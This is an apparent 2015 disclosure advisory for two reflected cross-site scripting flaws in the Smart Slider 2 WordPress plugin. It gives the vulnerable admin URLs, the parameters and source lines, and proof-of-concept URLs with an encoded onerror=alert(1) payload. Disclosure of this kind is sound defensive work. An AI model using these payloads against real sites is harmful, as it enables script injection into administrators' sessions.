Subject: Cross-Site Scripting (XSS) in Smart Slider 2 2.3.11

Date: Wed, 26 Aug 2015 13:12:08 +0200

Hello,

Plugin: Smart Slider 2 2.3.11 https://wordpress.org/plugins/smart-slider-2/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET/POST

Url: http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_generator&action=generatorsettings&sliderid=-1&group=1&type=[xss]

Vulnerable parameters: type, gotopreset

Example PHP callstack:

/smart-slider-2/library/smartslider/admin/views/sliders_generator/tpl/settings.php:48

Verification:

http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_generator&action=generatorsettings&sliderid=-1&group=1&type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_generator&action=generatorsettings&sliderid=-1&gotopreset=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

2. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET/POST

Url: http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_slider&action=changedynamiclayout&type=quick&fontset=1&sliderid=-1&layout=[xss]

Vulnerable parameters: layout, type

Example PHP callstack:

/smart-slider-2/library/smartslider/admin/views/sliders_slider/tpl/changedynamiclayout.php:122

Verification:

http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_slider&action=changedynamiclayout&type=quick&fontset=1&sliderid=-1&layout=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

http://localhost/wp-admin/admin.php?page=nextend-smart-slider2&controller=sliders&view=sliders_slider&action=changedynamiclayout&type=quick&fontset=1&sliderid=-1&type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,